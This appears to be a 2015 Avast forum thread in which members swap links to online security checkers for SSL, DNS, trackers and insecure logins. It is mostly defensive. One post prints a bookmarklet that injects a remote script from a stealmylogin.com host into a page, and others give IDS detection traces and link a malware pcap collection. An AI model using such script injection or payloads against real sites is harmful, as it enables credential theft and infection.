Else you have to dig deep down into the register to get to traces of this.
There are 5 native scripts on that test site, none of which blocked and only google analytics dot com.
Nothing out of the ordinairy here as well: http://www.dnsinspect.com/filippo.io/1424639646 - hosted by CloudFlare.
I tested this site before I passed it on: http://fetch.scritch.org/%2Bfetch/?url=https%3A%2F%2Ffilippo.io%2FBadfish%2F&useragent=Fetch+useragent&accept_encoding=

In the case of Yes, the connection is not private: htxps://san.filippo.io/yes.js?cachekill=
and htxps://selfsigned.filippo.io/yes.js?cachekill=  &  htxps://badfish.filippo.io/yes.js?cachekill=
Could not get domain's name servers from parent servers, because it is self-signed naturally  ;D
html5shiv.js was implemented by the researchers to get results from earlier IE versions.

Security Header Status for test site - https://www.uploady.com/download/l0pdXoxI5Pi/7jjn923f6vpne2jP
Warnings on: The secure flag on cookies instructs the browser to only submit the cookie as part of requests over secure (HTTPS) connections. This prevents the cookie from being observed as plain text in transit over the network.
The HttpOnly flag instructs the browser that this cookie can only be accessed when sending an HTTP request. This prevents scripts running as part of a page from retrieving the value and is a defense against XSS attacks.
Major Warning: Data returned in web responses can be cached by user's browsers as well as by intermediate proxies. This directive instructs them not to retain the page content in order to prevent others from accessing sensitive content from these caches. But we have to trust the researcher expert's good intentions.

Again the proverb goes""You can take a horse to the water, but tou cannot make it drink!".

Damian

Manual removal of that Superfish: https://filippo.io/Badfish/removing.html
Title: Re: Tests and other Media topics
Post by: !Donovan on February 23, 2015, 03:37:28 AM
Time to clean the crap and junk from your computer: http://www.pcworld.com/article/2141881/beat-it-bloatware-how-to-clean-the-crap-off-your-pc.html

polonus
Another reason why to choose Chrome OS over traditional OSes :D

Greets
~!Donovan
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 01:41:31 PM
For one aspect DavidR is right, the SuperFish test site is vulnerable to POODLE: http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish
One big question as end-user - "What parties are left that we really can trust with our connections and data". From the days of the famous NSA revelations we know that we cannot put any trust anymore in Big Government and now it is shown that we cannot trust Big Commerce either. What more proof do we need - bad certificates, degraded and backdoored protocols, bad security implimentations and all of this more or less done on purpose to turn the Interwebs into one enormous big monitoring and surveillance machine that dragnets all your data for whoever benefits. Anyone who wants to color another picture there is wrong or keeping up the big lie especially to themselves - the Internet, my best friends, is pn*wned big time and has been so since the turn of this century.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 02:30:00 PM
Firefox now considers blacklisting: https://bugzilla.mozilla.org/show_bug.cgi?id=1134506

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 23, 2015, 03:29:12 PM
For one aspect DavidR is right, the SuperFish test site is vulnerable to POODLE: http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish (http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish)
One big question as end-user - "What parties are left that we really can trust with our connections and data". From the days of the famous NSA revelations we know that we cannot put any trust anymore in Big Government and now it is shown that we cannot trust Big Commerce either. What more proof do we need - bad certificates, degraded and backdoored protocols, bad security implimentations and all of this more or less done on purpose to turn the Interwebs into one enormous big monitoring and surveillance machine that dragnets all your data for whoever benefits. Anyone who wants to color another picture there is wrong or keeping up the big lie especially to themselves - the Internet, my best friends, is pn*wned big time and has been so since the turn of this century.

Damian
There are always smoke signals but they can also be intercepted.
2 cans connected by a string might be better.
There is an old saying that states:
"In God we trust, all others pay cash." It simply means there isn't any one in this world that can really be trusted.
Any time you share with anyone, you are taking a chance on having your information shared with an unexpected party.
I go back to the days when a handshake was your bond. Now, a handshake is simply another way of spreading germs.
This world has come a long way and there have been many technological improvements.
For somethings however we've also taken a giant stride backwards.





Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 03:54:18 PM
Hi bob3160,

I saw that all coming when I wrote this thread: https://forum.avast.com/index.php?topic=165018.0 re-read it and start to shiver, it brought us SuperFish and PrivDog and more corruption for that matter.
Just go here: http://cyh.herokuapp.com/cyh and check
Test here against POODLE: https://www.poodlescan.com/
Test here: http://toolbar.netcraft.com/site_report/
Now you will find that there is an enormous amount of https servers that are not following best policy configuration - have missing security headers - are forwarding excessive info to script kiddies and attackers or are just into shady ad-ware schemes and deals.
All that should really be trustworthy is backdoord, officially being downgraded, pn8wed grand time and no-one is stirring a finger - like the Wild West in 1871 where the sheriff was chased off by the criminals. Who is gonna speak up for the end-user?

And I have been addressing these insecurities time and time again with my website scanning in the virus and worms. If it only could convince one websmaster or hosting party to do a better job for the security of all.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 01:38:12 PM
A browser can check a certificate from a webserver whether it is actual and not revoked.
Is this a trusted CA? DANE helps you.
Test here: http://www.dnssec-failed.org/
and here: https://bad-sig.dane.verisignlabs.com/

Read: http://www.thesafemac.com/avasts-man-in-the-middle/
Anyone to comment to this story. Is it trustworthy info or a rant, as it pretty much required behavior for antivirus software when they want to scan https://
Likewise settings are found with ESET and Kaspersky;s but not in a standard way.

We trust in Avast, unless we test.

Also test here: https://www.had-pilot.com/dane/danelaw.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 07:08:42 PM
In the light of the spreading Super Fish Scandal, test DNSSEC: http://dnssec-debugger.verisignlabs.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 07:12:58 PM
Is avast vulnerable? http://dnssec-debugger.verisignlabs.com/forum.avast.com
-> https://www.uploady.com/download/5oAte0Qd2qw/0GQE66YVdXA2afhl

Superfish is very big to handle.....

Damian
Title: Re: Tests and other Media topics
Post by: polonus on March 04, 2015, 01:00:08 AM
Do this test to see whether your web client is vulnerable to the Freak Attack Threat:
https://www.freakattack.com/clienttest.html
My results Good News! Your browser appears to be safe from the FREAK Attack!
If you're curious, your client currently offers the following cipher suites:

But read: https://community.qualys.com/thread/12169
Checked OK here: https://www.ssllabs.com/ssltest/viewMyClient.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2015, 05:40:28 PM
As Open DNS now brought Nlp checking for domains - so checking the domain name comes with the same ASN and resembling domains  like -g00gle.com will get 2 minus points.
But we can also test websites here for Nlp: http://nlp-system.com.statstool.com/
and combine with this scan: http://www.dnsinspect.com/
Enjoy, my friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on March 05, 2015, 08:39:51 PM
As Open DNS now brought Nlp checking for domains - so checking the domain name comes with the same ASN and resembling domains  like -g00gle.com will get 2 minus points.
But we can also test websites here for Nlp: http://nlp-system.com.statstool.com/ (http://nlp-system.com.statstool.com/)
and combine with this scan: http://www.dnsinspect.com/ (http://www.dnsinspect.com/)
Enjoy, my friends, enjoy.

polonus
We can also use Avast's Online Security module and make sure the Site Correct function is checked:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1425584318772-10029.png)
This will prevent you form getting to that bad site in the first place. :)
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2015, 08:50:59 PM
Hi bob3160,

I always have an eye out on the green circle there.
See my settings now: https://www.uploady.com/download/MYNvUuPtuYV/iL9cBzhb2kcEbfJy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2015, 05:50:35 PM
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
What web to check can be found here: http://whatweb.net/
To find out what websites are Built With, check here: http://builtwith.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2015, 06:08:33 PM
Adsense banned checker: http://www.bannedbyadsense.com/
and another: http://www.isbanned.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 14, 2015, 05:13:04 PM
A GZip Discrimination test: http://nontroppo.org/tools/gziptest/?url=
Opera users can use this button to drag to a toolbar of choice: opera:/button/Go to page, %22http://nontroppo.org/tools/gziptest/?url=%25u%22

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2015, 10:07:12 PM
Test for Superfish in Google Chrome: https://lastpass.com/superfish/
For firefox there is this extension: https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on March 18, 2015, 11:00:00 PM
Test for Superfish in Google Chrome: https://lastpass.com/superfish/ (https://lastpass.com/superfish/)
For firefox there is this extension: https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded (https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded)

polonus

You can also run the LastPass test in Firefox if your using FF 37.0 :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426715840242-32424.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2015, 11:04:26 PM
Does http://screenshots.screencast-o-matic.com/screenshot/u/Lh/1426715840242-32424.png
works for all as in bob3160's reply? Hi bob, you and I are secure  ;D

See attached...
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2015, 03:50:14 PM
Is your DNS hijacked?
Test here: https://www.ismydnshijacked.com/
So your router DNS-settings were not altered by cybercriminals,
then all is well.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2015, 08:01:25 PM
To those that know how to protect themselves,   Message on ScriptSafe and uMatrix extensions for Google Chrome.

These two extensions are the best in-browser-security related extensions that came to be installed into the Google Chrome browser and the combination can be compared to the No-Script and Request Policy add-on combination for firefox.
For working both extensions you do not need rocket science, but if you want to surf dumbed down on full automatic clicking after anythings that shows up on the browser screen to completely work your PC or laptop into a doorstopper only state, please do not read on. When you trust others to take care of your browser security and you do not want to have anything to do with it, this posting is not meant for you.
For the others, this is not too hard. First know where you are going, whenever you are visiting a link from a search page that is not alerted as suspicious (Avast Online Security warning,  Bitdefender Traffic Light alert, DrWeb URL checker warning, Google Safebrowsing or Yandex blacklisting alert or privacy alert) or when you visited a website before work ScriptSafe green and allow the main site and block third parties or allow third parties also when that is needed for the full functionality of that page (else leave these blocked), for uMatrix you follow a likewise procedure, only click there if you need additional blocking or when you need more functionality on a certain secure webpage.
Rule 1 when you get an alert from Avast Online Security or the Avast Shields or Bitdefender TrafficLight extension or DrWeb's or Google Safebrowsing or Yandex alert, do not go to that destination and do not visit that website. When you are a responsible guy or gal report the link with hxtp or wXw so the unaware cannot get infected by clicking a live link. We have section for that here on the forums; the virus and worms or report to virus@avast.com.
Really folks, these two extension can be learned to be toggled and the additional bonus is advanced security (you can block any frame, any script you like inside the extension), more insight in what threatening things can arrive at your browser from the Interwebs and additional privacy by blocking scripts that try to track you with analytics, ads, widgets etc.
Install ScriptSafe and uMatrix from the Google Webstore https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf
and
https://chrome.google.com/webstore/detail/%C2%B5matrix/ogfcmafjalglgifnmanfmnieipoejdcf
learn to point and click and enjoy the advanced browser security you have gained through a couple of right toggling clicks.

An important observation - always toggle uMatrix first and then adjust ScriptSafe, just in that order!

Users that want to experience a uMatrix-like extension in firefox should try Policeman:
https://addons.mozilla.org/nl/firefox/addon/policeman/
Also support rules based on content type: images, styles, scripts, frames etc.
The purpsoe of the extension is similar to NoScript and RequestPolicy.

When uMatrix comes to firefox, we will be have a hard time to choose between chrome and firefox,
tired a bit of the increasing bloatness of these "googlalities",
but the searching versatility keeps me aboard.

Just look at a youtube website through the eyes of uMatrix with some 248 items that can be toggled.
Google is the Big Tracking machine par excellence.
For that reason I added Stop Tracking -> chrome://extensions/?id=cjadnibdialbplafleaocjllgggfflko
and you won't be tracked any longer.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2015, 05:32:21 PM
Who is using this block list in the hosts file?.
Re http://pgl.yoyo.org/adservers/serverlist.php?showintro=0;hostformat=hosts

One of the blocked items: https://www.mywot.com/en/scorecard/cash4webmaster.de?utm_source=addon&utm_content=popup
Spam. Scam and Ponzi Schemes...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2015, 11:11:28 AM
I did not notice this before, VT now give Snort and Suricata IDS alerts

An example here:
exploit detection
https://www.virustotal.com/en/file/961751ef6378515dc09a94135fa0c23d133aa41ae6dc2267340067773f51efde/analysis/

This is an important enhancement of virustotal scan capabilities, I can therefore compare these detections now with urlquery dot net scan results and the IDS alerts there and the Fortinet findings.
And check on the alerts, like "ET POLICY HTTP Request on Unusual Port Possibly Hostile (Potential Corporate Privacy Violation) -" leads us to these resources:  http://www.aldeid.com/wiki/Suricata-vs-snort/Test-cases/Malwares-viruses. These test-cases may be revealing, so one may learn what kind of malware comes 'covered by these rules" . So combining snort rule detection patterns can narrow down detection. Also one could compare the Fortinet findings from urlquery dot net and go after (search) either the malware name or IP preceded by the term Clean MX. So the search query "clean mx Packed.Generic.187" delivers: realtime:
http://support.clean-mx.de/clean-mx/md5.php?Sophos=Mal/Behav-351, this is a simple identification, see: https://malwr.com/analysis/MDMzOWM3MDM4Y2JhNDllMmI0YTFmN2MxOTdmMTAxNjA/  and then we return to the detailed snort analysis;
Quote
Packed.Generic.187
Test: 84dc4e81531c373e431d818790dd26d1
Payload: pcap
Suricata trace:
ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake
BACKDOOR rogue software ms antispyware 2009 runtime detection
Suricata score: 1
Snort trace:
A Network Trojan was detected
I think users should always have VT as a pre-checker in the browser now just one click away, for example via VTchromizer.
Read here from Madras Geek: http://www.madrasgeek.com/2010/12/scan-for-virus-malware-removal-with-virustotal-chromizer.html  download VTChromizer here-> https://chrome.google.com/extensions/detail/efbjojhplkelaegfbieplglfidafgoka

For the real g33ks and aware, a nice pcap collection here: https://www.mediafire.com/?a49l965nlayad#a49l965nlayad (info credits Mila Parkour) Be aware do not open payloads.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on April 11, 2015, 05:40:52 PM
Website Test behind the Great Firewall of China for various locations:
http://www.websitepulse.com/help/testtools.china-test.html
and http://www.greatfirewallofchina.org/
and here: https://en.greatfire.org/
DNS tests: http://viewdns.info/chinesefirewall/
See attached our forum website seems blocked:
Contradictory results here: https://en.greatfire.org/https/forum.avast.com/index.php

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2015, 11:58:18 PM
What uMatrix is blocking as malware domains/just domains - updated 3rd-party assets
Those users here on the forums working ScriptSafe next to uMatrix like to have this info.
updated 3rd-party assets: https://github.com/gorhill/uMatrix/commit/d2ed6778c59d2592ecb3f854a4853b522e38ec30
Also look here: https://github.com/gorhill/uMatrix/blob/master/assets/umatrix/blacklist.txt
# Blacklist maintained by HTTP Switchboard (the pre-decessor of the uMatrix extension).
# For those domain names which are not found in other blacklists
enjoy....

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 15, 2015, 10:49:07 PM
Cookie cheker test: http://www.123simples.com/website-cookie-test.asp
see: http://websitecookiechecker.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 11:21:38 AM
To-day I was surveying at a design coding exam at a Higher Educational Insitute for IT staff outbuilding and polonus would not be polonus when he would not be going over the code.
When "public Void" was staring back at me and I combined that with the words "override" and "XSS exploitable".
Re: http://ricardozuasti.com/2012/stronger-anti-cross-site-scripting-xss-filter-for-java-web-apps/
See: https://github.com/tonyzampogna/XssSanitizer/blob/master/test/unit/org/tonyzampogna/xss/sanitizer/util/XssSanitizerUtilTest.java
This example shows how in the JVM memory system two objects are at a different address while the stored parameter is in the same memory location, and is overwritten by the second method. This is the basis of the "vulnerability".
actually it is a so-called C vulnerability, that you need not live with if you develop in Java.

info credits go to thomas-pornin

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 11:43:43 AM
Test whether an iis server has been patched with MS15-034.
Go here: https://lab.xpaw.me/MS15-034/
Example: Cannot discern patch status of www.iisprotect.com. This most likely means it is not vulnerable.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 01:26:52 PM
Check and secure Browser and Plug-in check: http://www.check-and-secure.com/browsercheck/_en/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 04:55:26 PM
A nice companion for Google Chrome's ScriptSafe and uMatrix and uBlock extensions is
Webpage behavior report tool known as Browser JSGuard -
Supported by DeitY & CERT-In, Govt. of India

An Addon for Detecting Malicious and Suspicious Webpages.
Features:
Content/Heuristic based web malware protection.
Alerts the user on malicious web pages.
Provides detailed analysis of a webpage(by clicking on the icon present in Addon bar).

It checks for Hidden iFrame(s) Redirections.
UnAuthorized Redirections
Encoded Javascript
External Domain Requests
Trackers

Download: https://chrome.google.com/webstore/detail/browserjsguard/ncpkigeklafkopcelcegambndlhkcbhb

I tested it and rather like this extension.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 10:27:32 PM
Real tracking is more extensive than extensions show you.....
See real results via txt file attached
Bitdefender blocks Comscore Beacon and OneStat Tracker, ScriptSafe blocks <WEBBUG> (1)
Ghostery blocks TradeDesk, Avast Online Security does not block any.
Disconnect blocks Google Analytics. uMatrix blocks screencast-o-matic.com. *
http://screencast-o-matic.com links to the following External Domains:
==>twitter-badges.s3.amazonaws.com
==>platform.twitter.com
==>facebook.com  & facebook tracker found.

So there is much more tracking going on under the browser hood than we learn from Bitdefender, DrWeb's, Avast,
Ghostery, Disconnect and the others. The following sites know that you have visited this page:
The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-adsrvr.org
-bing.com
-bkrtx.com
-idg.nl
-leadboxer.com
-plista.com
-stepstone.nl

polonus

P.S. -sync.search.spotxchange.com and others blocked by μMatrix
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2015, 11:04:39 PM
Syntax validator online: http://esprima.org/demo/validate.html

enjoy
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2015, 07:16:08 PM
Check your internet connection in three steps: http://www.check-and-secure.com/ipcheck/_en/solution/clean.php

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on April 23, 2015, 09:52:11 PM
Real tracking is more extensive than extensions show you.....
See real results via txt file attached
Bitdefender blocks Comscore Beacon and OneStat Tracker, ScriptSafe blocks <WEBBUG> (1)
Ghostery blocks TradeDesk, Avast Online Security does not block any.
Disconnect blocks Google Analytics. uMatrix blocks screencast-o-matic.com. *
http://screencast-o-matic.com (http://screencast-o-matic.com) links to the following External Domains:
==>twitter-badges.s3.amazonaws.com
==>platform.twitter.com
==>facebook.com  & facebook tracker found.

So there is much more tracking going on under the browser hood than we learn from Bitdefender, DrWeb's, Avast,
Ghostery, Disconnect and the others. The following sites know that you have visited this page:
The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-adsrvr.org
-bing.com
-bkrtx.com
-idg.nl
-leadboxer.com
-plista.com
-stepstone.nl

polonus

P.S. -sync.search.spotxchange.com and others blocked by μMatrix
I've used and recommended Screencast-O-Matic for a few years.
It's my main program for creating instructional and other Video's.
I also use it to create screenshots which you'll find on many of the posts in this forum.
There is blocking and then there's getting a little out of hand.
Why not simply stop using any of the modern browsers and stop going to any of the websites ???
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2015, 11:08:13 PM
Hi bob3160,

Well me demonstrating this is just for educational purposes and just to show how one-sided the whole story has become.
It seems the user is just being tolerated for what known reasons, but does not play any role. The users are just generating clicks in a pay per click model.

And it is gonna get much worse when TTP arrives - companies and investors would be empowered to challenge regulations, rules, government actions and court rulings — federal, state or local — before tribunals and the role of governments and end-users will be further minimalized, as lawyers like to have their piece of the cake with these big international corporations.

That is where we are heading in the near future on both sides of the Atlantic and there is not much we can do about it,
so I will happily browse on while I can and use Google as my global instrument with Avast inside.  ;D

Damian
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2015, 06:39:54 PM
Example generated Javascript Alert Code
Copy and paste the code between the <head> </head> tags of your webpage. The alert will pop up on page load
Code: [Select]
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide from older browsers
alert('You are getting this alert at this very moment');
// end hiding -->
</SCRIPT>

Handy code generators here: http://www.htmlbasix.com/

And to bring in some randomness go here: http://www.randomcodegenerator.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2015, 02:03:10 PM
Is this a secure service?: https://www.dashlane.com/scan/11#/login

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on April 25, 2015, 04:08:32 PM
Is this a secure service?: https://www.dashlane.com/scan/11#/login (https://www.dashlane.com/scan/11#/login)

polonus
A service of Dashlane (https://www.dashlane.com/) the Password Manager program.
(if you trust them with your passwords, then this should be safe. :)

Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2015, 03:04:51 PM
Mixed content still the easiest way to break SSL: http://blog.ivanristic.com/2014/03/https-mixed-content-still-the-easiest-way-to-break-ssl.html  (web article author = Ivan Ristić).
Check the insecure content on a website here: https://www.jitbit.com/sslcheck/
or here: https://www.whynopadlock.com/

Re: https://www.bram.us/2014/12/10/mixed-content-scan-scan-your-https-enabled-website-for-mixed-content/
Fix
The best strategy to avoid mixed content blocking is to serve all the content as HTTPS instead of HTTP.

For your own domain, serve all content as HTTPS and fix your links.  Often, the HTTPS version of the content already exists and this just requires adding an "s" to links - http:// to https://.

For other domains, use the site's HTTPS version if available. If HTTPS is not available, you can try contacting the domain and asking them if they can make the content available via HTTPS.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2015, 05:41:53 PM
I often see a lot of site with insecure login flagged by saferChrome, like here:
SaferChrome: Insecure login: Password will be transmited in clear to http://www.dagelijksestandaard.nl/wp-login.php?redirect_to=%2F2015%2F04%2Fvijf-lekkere-snacks-die-je-koningsdag-nog-beter-maken%2F5%2F detected

Read: http://www.stealmylogin.com/ written by Alex Sirota
Exposing the dangers of insecure login forms *

The bookmarklet (from here *) used to test:
Code: [Select]
GET //data.stealmylogin.com/stealmylogin.js';document.getElementsByTagName('head')[0].appendChild(s);alert('StealMyLogin%20injected');})(); HTTP/1.1
Host: javascript:(function() {var s=document.createElement('script');s.src='http:

polonus

Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2015, 12:27:32 AM
Testing for SHA-1 online.
Unsecure, checked at: https://shaaaaaaaaaaaaa.com/check/www.tivo.com
results: Dang.
www.tivo.com is using SHA-1.
Which is too bad, because SHA-1 is becoming dangerously weak. It's time to upgrade to SHA-2.
Compare here:
http://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fwww.tivo.com%2Ftivo-mma%2Flogin%2Fshow.do

Read on backgrounds: https://konklone.com/post/why-google-is-hurrying-the-web-to-kill-sha-1http://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fwww.tivo.com%2Ftivo-mma%2Flogin%2Fshow.do

On that page as a bonus a converter: http://konklone.io/json/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2015, 02:34:00 PM
Test your PHP code online here:
http://www.icosaedro.it/phplint/phplint-on-line.html
Results for some code I gave in:
Code: [Select]
PHPLint report
PHPLint 2.1_20150305
Copyright 2015 by icosaedro.it di Umberto Salsi
This is free software; see the license for copying conditions.
More info: http://www.icosaedro.it/phplint

BEGIN parsing of /tmp/test-61ynKJ
1:      <?php
2
:      function rbl_lookup($ipv4) {

        function 
rbl_lookup($ipv4) {
                                  \
_ HERE
==== 2ERRORundefined type for argument $ipv4Hintyou may indicate an explicit type (example: `/*.int.*/ $ipv4') or assign a default value (example: `$ipv4=123') or add a DocBlock line tag (example: `@param int $ipv4').
3:          $ip explode("."$ipv4);
4:          $rbl_url ".rbl.blockedservers.com";
5:          $rbl_hostname $ip[3].".".$ip[2].".

            
$rbl_hostname = $ip[3].".".$ip[2].".
                                                \
_ HERE
==== 5Warningfound control character (carriage return, CR13in literal stringThis msg is reported only once for each string
6
:                        ".$ip[1].".".$ip[0]."". $rbl_url;
7:      
8:          
$rbl_lookup = gethostbyname($rbl_hostname);
9:      
10:         if(
$rbl_lookup == $rbl_hostname) {

            if(
$rbl_lookup == $rbl_hostname) {
                                           \_ HERE
==== 10: ERROR: comparing (string) == (string) - Hint: use strict comparison operator `===' instead.
11:             return 1;
12:         }
13:         else {
14:             return 0;
15:         }
16:     }
17:     ?>

END parsing of /tmp/test-61ynKJ
==== ?:?: notice: unused module mysql.php
==== ?:?: notice: unused module pcre.php
==== ?:?: notice: unused package stdlib/dummy.php
==== ?:?: notice: required module standard.php
Overall test results: 2 errors, 1 warnings.
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2015, 03:40:21 PM
Test - Check the Revocation Lists (CRL) and the OCSP status of an (SSL) Certificate
online here: http://certificate.revocationcheck.com/
Test Created by Paul van Brouwershaven

In the days of HTTPS Everywhere we need such checks more than ever.
Nice to combine with a Netcraft Tool Results report.

We even have some risk here: http://toolbar.netcraft.com/site_report?url=http://certificate.revocationcheck.com
Bad zone = alex.ns.cloudflare.com -> http://www.dnsinspect.com/cloudflare.com/1430833139
Read: https://blog.cloudflare.com/whats-the-story-behind-the-names-of-cloudflares-name-servers/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2015, 05:56:33 PM
I give an example of a problem site: solarlist.com Identity verified but with warnings
Encryption (HTTPS) (1)
Communication is encrypted
Site tries to load scripts from sources that weren't verified - so-called mixed content.
Possible Frontend SPOF from:

maps.google.com - Whitelist
(75%) - <script type='text/javascript' src='http://maps.google.com/maps/api/js?sensor=false&ver=1.0'>
html5shiv.googlecode.com - Whitelist
(71%) - <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js">
fonts.googleapis.com - Whitelist
(69%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,700' rel='stylesheet' type='text/css'>
(69%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,700' rel='stylesheet' type='text/css'>
s3.amazonaws.com - Whitelist
(11%) - <script src="//s3.amazonaws.com/scripts.hellobar.com/c42e00ca9c042c9f6457cf24ee9836a494d021b3.js" type="text/javascript">

See check: http://certificate.revocationcheck.com/solarlist.com

See: https://www.eff.org/https-everywhere/atlas/domains/solarlist.com.html

The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-amazonaws.com
-google.com
-vimeo.com

Netcraft Website Risk Ranking 1 red out of 10: http://toolbar.netcraft.com/site_report?url=https://solarlist.com

Scanning target:  162.159.246.65 on port 443 ...

Found 1 servers with port 443 open
Checking for SSLv3 POODLE vulnerability...

IP address   Hostname   Status   Vulnerable ciphers
162.159.246.65      NOT Vulnerable   
Where I sacnned this? Here: https://pentest-tools.com/vulnerability-scanning/ssl-poodle-scanner

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2015, 11:50:03 PM
Test for  X-XSS-Protection: 1; mode=block: http://www.enhanceie.com/test/xss/BlockMode.asp

What is this? X-XSS-Protection is a HTTP header understood by Internet Explorer 8 (and newer versions). This header lets domains toggle on and off the "XSS Filter" of IE8, which prevents some categories of XSS attacks. IE8 has the filter activated by default, but servers can switch if off by setting.
As  it seems to me (proof is hard to find) that it only protects against Reflected XSS (infosecisland.com/blogview/…), also because it does not have any mean to detect Stored XSS (also called Persistent XSS) info credits go to Luca Invernizzi at stackoverflow!

polonus

Netcraft extension and malware script detector will be flagging this and block it as well:
Quote
This page has been blocked by the Netcraft Extension for the following reason:

Suspected XSS Attack

Blocked URL: http://webdbg.com/test/xss/HelloBlockMode.asp?lotsoX=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx etc.

D

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2015, 01:23:24 AM
With voices heard to legalize mass surveillance at least until 2020, here is an insteresting website with projects to opt out (where and while still possible) -> https://prism-break.org/en/
Quote
Disclaimer: Using the recommended projects on this site will not guarantee that 100% of your communications will be shielded against surveillance states. Please do your own research before trusting these projects with sensitive information.
Disclaimer quote taken from above website. Link source - Peng Zhong 2015.

polonus

P.S. A weird test result: https://en.wikipedia.org/wiki/Intelligence_Quotient_%28IQ%29_and_Browser_Usage

D
Title: Re: Tests and other Media topics
Post by: polonus on May 12, 2015, 07:07:01 PM
Open port check tool: http://www.yougetsignal.com/tools/open-ports/
The open port checker is a tool you can use to check your external IP address and detect open ports on your connection. This tool is useful for finding out if your port forwarding is setup correctly or if your server applications are being blocked by a firewall. This tool may also be used as a port scanner to scan your network for ports that are commonly forwarded. It is important to note that some ports, such as port 25, are often blocked at the ISP level in an attempt to prevent malicious activity.
Combine with a Dazzlepod IP check: https://dazzlepod.com/ip/

Mind that the results can only be for IPs you own and you cannot publish third party scan results.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2015, 11:51:12 PM
A short survey of IP blocklists:

https://atlas.arbor.net/
http://support.clean-mx.de/clean-mx/viruses
http://www.cymru.com/Documents/bogon-dd.html
http://www.dshield.org/ipsascii.html
http://www.emergingthreats.net/index.php/rules-mainmenu-38.html
http://code.google.com/apis/safebrowsing/
http://hosts-file.net/
http://malc0de.com/database/
http://www.malwaredomains.com/wordpress/?page_id=66
http://www.malware-control.com/
http://malwared.ru/database.php?page=1
http://www.malwaredomainlist.com/hostslist/hosts.txt
http://www.malware.com.br/lists.shtml
http://www.malwareurl.com/
